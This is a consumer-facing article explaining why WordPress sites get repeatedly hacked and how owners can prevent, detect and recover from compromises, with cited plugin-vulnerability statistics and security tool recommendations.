If your WordPress site has been hacked more than once, the problem is almost never WordPress itself. The real issue is what surrounds it: outdated plugins, weak login credentials, poor hosting environments, and incomplete malware cleanups that leave hidden backdoors wide open for attackers to walk back in. According to Patchstack’s 2025 security report, 11,334 vulnerabilities were discovered in the WordPress ecosystem in a single year — a 42% increase from the year before — and 91% of those vulnerabilities were found in plugins and themes, not in WordPress core. The good news is that the vast majority of WordPress hacks are preventable, and the steps required are not complicated.
Key Takeaways
- Outdated plugins are the single biggest entry point for attackers.
- Most hacks are automated , bots scan thousands of sites per hour looking for known weaknesses.
- If your site keeps getting re-hacked, an incomplete cleanup and leftover backdoors are almost certainly the reason.
- Strong passwords, two-factor authentication, and a web application firewall stop the majority of attacks.
- Regular backups do not prevent hacks but give you a clean recovery path when one happens.
- Cheap shared hosting increases your exposure , one compromised neighbor site can affect yours.
Why WordPress Is Such a Common Target
WordPress is the most widely used CMS in the world, which makes it the most studied, most probed, and most frequently attacked platform by automated bots. Hackers do not sit at a keyboard manually trying to break into individual sites. They run bots that scan millions of websites per day looking for known vulnerability signatures — outdated plugin version numbers, default login URLs, and weak password patterns.
The plugin and theme ecosystem is where most of the risk lives. Thousands of independent developers maintain tens of thousands of plugins, and the quality of security practices varies widely across all of them. When a vulnerability is discovered and publicly disclosed, attackers move fast. According to Patchstack’s 2025 data, exploits are launched within 5 hours of a vulnerability being made public. Most site owners are not patching that quickly.
The scale of the problem is also worth noting. 43% of WordPress vulnerabilities can be exploited without any login credentials at all — meaning an attacker does not need your username or password to get in. They just need your site to be running a vulnerable version of a plugin. As Bruce Schneier, one of the world’s foremost security experts, put it: “Security is not a product, but a process.” For WordPress site owners, that process starts with understanding exactly how attacks happen.
The Real Reasons Your WordPress Site Keeps Getting Hacked
1- Outdated Plugins and Themes
Outdated plugins and themes are the number one reason WordPress sites get hacked. When a developer patches a vulnerability, that patch note is public — and bots immediately begin scanning the web for sites still running the unpatched version. Inactive plugins that are installed but not in use carry the exact same risk as active ones. If it is installed and outdated, it is a door.
The numbers here are stark. Of the 11,334 vulnerabilities discovered in 2025, 91% were in plugins and themes. Only 6 vulnerabilities were found in WordPress core across the entire year. Premium marketplace plugins from platforms like Envato carry additional risk because they receive less independent security scrutiny — their code is not publicly accessible to researchers the way free repository plugins are.
2- Weak Passwords and No Two-Factor Authentication
Brute force attacks use bots that try thousands of password combinations per second against your wp-admin login page. The WordPress login URL is publicly known and heavily targeted. If your password is short, common, reused from another account, or based on personal information, it is only a matter of time before it is cracked.
Two-factor authentication is the fix that stops brute force attacks even when a password is compromised. With 2FA enabled, a stolen password alone is not enough to get into your admin area. Despite being free and easy to set up via plugins like WP 2FA or Google Authenticator, the majority of WordPress site owners have never turned it on. That gap is exactly what attackers count on.
3- Nulled Themes and Plugins
Nulled software is pirated paid software distributed for free across shady download sites. It almost always contains pre-installed malware, hidden backdoors, and malicious code injected before you ever install it. The moment a nulled plugin goes live on your site, an attacker potentially already has access.
Beyond the malware risk, nulled plugins have no update pathway. When a vulnerability is discovered in the original software, a legitimate user gets a patch. A nulled user gets nothing. The site remains permanently exposed to that specific exploit, with no fix available and no way to know the risk even exists.
4- Poor Hosting Environment
The hosting environment your site sits in matters more than most people realize. Cheap shared hosting places your site on a server alongside hundreds of other websites. If one of those sites gets compromised and the host has not properly isolated accounts at the server level, the infection can spread to neighboring sites including yours.
Hosts that do not enforce updated PHP versions, server-level firewalls, or malware scanning add passive risk to every site on their platform. A $2/mo hosting plan is not a saving when a single hack costs hours of cleanup time, lost search rankings, and potential customer trust damage. Security-focused managed WordPress hosts like WP Engine, Kinsta, and SiteGround handle a significant portion of the security burden at the infrastructure level.
5- Leftover Backdoors from a Previous Hack
This is the most overlooked reason sites keep getting hacked repeatedly. When a site is compromised, attackers almost always install backdoors — hidden pieces of code that let them return without needing a password. These backdoors are often buried deep in theme files, plugin directories, the wp-content/uploads folder, or injected directly into the database.
Many site owners remove the visible damage — the spam pages, the strange redirects — without ever finding and eliminating the backdoor. The attacker simply waits and re-enters. If your site has been hacked more than once, an incomplete previous cleanup is the most likely explanation. A full malware scan using a tool like Sucuri, MalCare, or Wordfence is not optional — it is the only way to confirm the site is actually clean.
6- No Web Application Firewall
A web application firewall sits between your site and incoming traffic, blocking malicious requests before they reach WordPress. It filters brute force login attempts, SQL injection attacks, cross-site scripting, and known exploit patterns automatically.
One critical detail many site owners miss: generic hosting-level firewalls block only around 12% of WordPress-specific attacks, according to Patchstack data. A WordPress-aware WAF from Wordfence, Sucuri, or Cloudflare understands the specific request patterns that WordPress vulnerabilities produce and is far more effective. Assuming your hosting provider’s security covers you at this level is a mistake that leaves the majority of WordPress-specific attack traffic unblocked.
7- Default Login Settings Left Unchanged
Using “admin” as a WordPress username is one of the first things brute force bots try. It was the WordPress default for years and remains the most commonly attacked username. The login URL at /wp-admin and /wp-login.php is publicly known and receives enormous volumes of automated attack traffic every day.
Changing the default username costs nothing. Moving the login URL with a plugin like WPS Hide Login immediately eliminates a large portion of automated bot traffic from ever reaching your login page. These are two-minute changes that remove meaningful attack surface.
Signs Your WordPress Site Has Been Hacked
Many hacks run silently for weeks or months before a site owner notices. Attackers prefer to stay hidden — injecting spam content, harvesting data, using your server to send phishing emails — without triggering any obvious disruption. These are the warning signs to check regularly:
| Warning Sign | What It Means |
| Google Search Console shows security warnings | Google has detected malware or hacked content on your site |
| Browser shows ‘This site may be hacked’ | Google’s Safe Browsing has flagged your domain |
| Visitors are redirected to spam or adult sites | Redirect malware or a compromised .htaccess file |
| New admin users you did not create | Attacker has created persistent access accounts |
| PHP files in /wp-content/uploads/ | Malicious scripts planted in normally media-only folder |
| Spam pages appearing in Google results | SEO spam injection — casino, pharma, or foreign-language content |
| Hosting provider suspends your account | Host’s malware scanner detected a serious infection |
| Unexplained CPU or bandwidth spikes | Your server is being used to send spam or run attacks |
| Emails from your domain land in spam | Your domain reputation has been damaged by malicious sending |
| Your password suddenly stops working | Attacker has changed your credentials to lock you out |
How to Prevent Your WordPress Site from Getting Hacked
Keep Everything Updated
Every WordPress core update, plugin update, and theme update that goes uninstalled is a known vulnerability sitting on your site waiting to be exploited. Updates are the single highest-return security action available to any WordPress site owner.
- Enable automatic updates for WordPress core minor releases
- Update all plugins and themes immediately when patches are available
- Remove inactive plugins and themes entirely — deactivated does not mean safe
- Check plugin changelogs for security-related notes before updating on live sites
- Replace abandoned plugins (no updates in 12+ months) with actively maintained alternatives
Use Strong Unique Passwords and a Password Manager
Every account connected to your WordPress site — admin users, hosting account, FTP, database — needs a unique password that is not used anywhere else. Password reuse is how one data breach at an unrelated service becomes a WordPress hack. A leaked credential from a breach database gets tested against WordPress login pages automatically.
- Minimum 16 characters with mixed case, numbers, and symbols
- Never reuse a password across any two accounts
- Use a password manager like Bitwarden or 1Password to generate and store credentials
- Force all admin and editor users on your site to update their passwords
Enable Two-Factor Authentication on Every Admin Account
Two-factor authentication means that even if an attacker has your correct password, they still cannot log in without the second verification step. App-based authenticators like Google Authenticator and Authy are more secure than SMS-based 2FA, since phone numbers can be hijacked through SIM swapping attacks.
Install WP 2FA or a similar plugin and apply it to every administrator and editor account on your site — not just your own. A single team member with 2FA disabled is an open door for the entire site.
Install a Security Plugin with a Web Application Firewall
A dedicated WordPress security plugin handles firewall protection, malware scanning, login attempt limiting, and real-time alerts from inside the WordPress application layer — where hosting-level security cannot reach.
| Plugin | Key Features | Cost |
| Wordfence | WAF, malware scanner, brute force protection, live traffic monitor | Free / Premium from $119/yr |
| Sucuri Security | WAF, malware scanning, post-hack cleanup, blacklist monitoring | Free / Premium from $199/yr |
| iThemes Security | Login protection, file change detection, 2FA, database backups | Free / Premium from $99/yr |
| MalCare | Deep malware scanning, one-click cleanup, bot protection | Premium from $99/yr |
Change the Default Login URL and Username
Move your login page away from /wp-admin and /wp-login.php using WPS Hide Login. This alone removes a significant volume of automated attack traffic that never needs to reach your server. Pair this with a login attempt limiter — after three to five failed attempts, the IP address gets blocked.
If your current WordPress username is “admin”, create a new administrator account with a different username, transfer all content to it, and delete the old admin account. This two-minute change eliminates the most commonly targeted username from your site entirely.
Set Up Automated Backups Stored Off-Site
Backups do not stop attacks, but they make recovery clean and fast. Without a recent backup, recovering from a serious hack can mean rebuilding the site from scratch. With one, recovery is a restoration process measured in minutes.
- Use UpdraftPlus, BlogVault, or your host’s built-in backup tool
- Store backups off-site — not on the same server as your WordPress installation
- Set daily backups for active sites, weekly minimum for low-traffic sites
- Test your restore process periodically — a backup you have never tested may not work when needed
Switch to Security-Focused Managed Hosting
If you are currently on cheap shared hosting, the infrastructure around your site is working against your security. Managed WordPress hosts build security into the server layer — isolated accounts, server-level firewalls, automatic malware scanning, and PHP version enforcement are all standard.
The cost difference between cheap shared hosting and entry-level managed WordPress hosting is often $10-$20/mo. When weighed against the cost in time, lost traffic, and cleanup work that a single hack produces, managed hosting is consistently the better investment for any site generating real business value.
What to Do Immediately If Your Site Is Hacked Right Now
Time matters when a site is compromised. Every hour of delay means more spam content indexed by Google, more visitors exposed to malware, and more time for the attacker to deepen their access. Work through these steps in order:
- Put the site in maintenance mode to stop visitors being exposed to malicious content
- Change all passwords immediately — WordPress admin accounts, hosting panel, FTP, and database
- Contact your hosting provider — server logs can identify the breach entry point
- Run a full malware scan using Sucuri SiteCheck, MalCare, or Wordfence
- Restore from a clean backup taken before the compromise if one exists
- Remove all malware files, injected code, unknown admin accounts, and backdoors
- Update every plugin, theme, and WordPress core to current versions
- Submit a Security Review request in Google Search Console to remove browser warnings
Once the site is clean, do not stop there. Identify specifically how the attacker got in. If the entry point is not closed — a vulnerable plugin still installed, a weak password still in use — the same attack will happen again. Cleanup without root cause resolution is just delaying the next incident.
Frequently Asked Questions
Why does my WordPress site keep getting hacked even after I clean it?
The most common cause is an incomplete cleanup. Attackers almost always install backdoors — hidden code that lets them return without a password. Removing visible malware without finding every backdoor means the attacker still has a way back in. A thorough scan using a tool like MalCare or Sucuri, followed by a full password reset on all accounts, is required to break the cycle.
Is WordPress itself insecure?
WordPress core is not the problem. Only 6 vulnerabilities were found in WordPress core across all of 2025. The risk sits in the plugins, themes, and configurations built around it. A WordPress site with minimal, well-maintained plugins and proper security settings is as safe as any other platform.
How do hackers find my WordPress site?
Automated bots scan millions of sites per day looking for known vulnerability signatures — outdated plugin version numbers, default login URLs, and common password patterns. Your site was almost certainly not manually targeted. It was found by a bot running an automated sweep and matched a known vulnerability profile.
Can cheap hosting cause my WordPress site to get hacked?
Yes. Shared hosting without proper account isolation means a compromised site on the same server can affect yours through cross-contamination. Hosts that do not enforce updated PHP versions or server-level malware scanning add passive risk to every site on their platform. Security-focused managed WordPress hosting significantly reduces this exposure.
How do I know if my WordPress site has been hacked?
Check Google Search Console for security warnings or manual actions. Look for unfamiliar admin user accounts in your dashboard, unexpected redirects, PHP files in your uploads directory, and spam pages appearing in your Google search results. Your hosting provider’s malware alerts and browser warnings from visitors are also reliable early signals.
Do I need a security plugin if my host already provides security?
Yes. Hosting-level security handles server infrastructure threats but cannot address WordPress-specific attack vectors like plugin exploits, brute force login attempts, and file injection inside the application layer. A WordPress security plugin adds protection that hosting-level tools are not designed to provide. Both layers together give you the most complete coverage.
What is the fastest way to secure a WordPress site?
Update every plugin, theme, and WordPress core to current versions. Change all passwords to strong unique ones. Enable two-factor authentication on all admin accounts. Install a security plugin with a WAF. Remove unused plugins and themes. Change the default login URL. These six steps, done in under an hour, close the entry points responsible for the large majority of WordPress hacks.
Can a hacked WordPress site affect my SEO?
Yes, significantly. Google blacklists sites with detected malware and injects ‘This site may be hacked’ warnings directly into your search listings. SEO spam injection replaces your legitimate pages with casino, pharma, or foreign-language spam content in search results. Recovering your search visibility after a serious hack can take two to four weeks even after a clean site has been resubmitted for Google’s review.
